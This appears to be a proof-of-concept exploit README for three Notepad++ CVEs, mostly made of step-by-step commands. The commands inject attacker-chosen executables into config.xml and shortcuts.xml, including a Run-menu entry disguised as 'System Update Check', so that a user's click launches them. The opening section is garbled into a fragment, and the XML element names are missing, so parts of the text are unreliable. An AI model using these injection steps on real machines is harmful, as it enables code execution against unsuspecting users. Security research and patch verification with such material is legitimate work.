## https://sploitus.com/exploit?id=96A4488F-33E5-52B1-8A37-193338512515
# Notepad++ PoCs
*CVE-2026-48770 / CVE-2026-48778 / CVE-2026-48800*
Proof-of-concept scripts for three vulnerabilities in Notepad++ 0xc0000005)
```
Notepad++ window disappears. WER (Windows Error Reporting) may trigger.
---
## CVE-2026-48778 - RCE via config.xml
`%APPDATA%\Notepad++\config.xml` is read at startup. The `` value is passed directly to `ShellExecute()` without validation. Replacing it with any executable achieves RCE when the user clicks **File โ Open Containing Folder โ cmd**.
### Method A - Python script (recommended)
```
# Inject (backs up original automatically)
python poc_CVE-2026-48778.py --mode direct --payload calc.exe
# Trigger: open Notepad++ -> File -> Open Containing Folder -> cmd
# calc.exe launches instead of cmd.exe
# Restore
python poc_CVE-2026-48778.py --mode direct --restore
```
### Method B - Drop XML file
```
copy payloads\config.xml %APPDATA%\Notepad++\config.xml
# Open Notepad++ -> File -> Open Containing Folder -> cmd
```
### Method C - settingsDir (no AppData write)
```
python poc_CVE-2026-48778.py --mode settingsdir --payload calc.exe
# Prints the notepad++.exe -settingsDir= launch command
# Trigger: File -> Open Containing Folder -> cmd
```
---
## CVE-2026-48800 - RCE via shortcuts.xml
`%APPDATA%\Notepad++\shortcuts.xml` is read at startup. `` entries under `` are added to the **Run** menu and passed directly to `ShellExecute()` without validation. An attacker-controlled entry executes on click.
### Method A - Python script (recommended)
```
# Inject (backs up original automatically)
python poc_CVE-2026-48800.py --mode direct --payload calc.exe --name "System Update Check"
# Trigger: close and reopen Notepad++ -> Run menu -> "System Update Check"
# calc.exe launches
# Restore
python poc_CVE-2026-48800.py --mode direct --restore
```
### Method B - Drop XML file
```
copy payloads\shortcuts.xml %APPDATA%\Notepad++\shortcuts.xml
# Restart Notepad++ -> Run menu -> "System Update Check"
```
### Method C - settingsDir (no AppData write)
```
python poc_CVE-2026-48800.py --mode settingsdir --payload calc.exe
# Prints the notepad++.exe -settingsDir= launch command
# Trigger: Run menu -> "System Update Check"
```
---
## Mitigation
**Update Notepad++ to v8.9.6.1 or later.**
Download: https://notepad-plus-plus.org/downloads/
---
## Advisory References
| CVE | Advisory |
|-----|----------|
| CVE-2026-48770 | GHSA-r39g-3mcw-xcg2 |
| CVE-2026-48778 | GHSA-7hm3-wp5q-ccv9 |
| CVE-2026-48800 | GHSA-3x3f-3j39-pj3v |
---
> For research and authorized testing purposes only.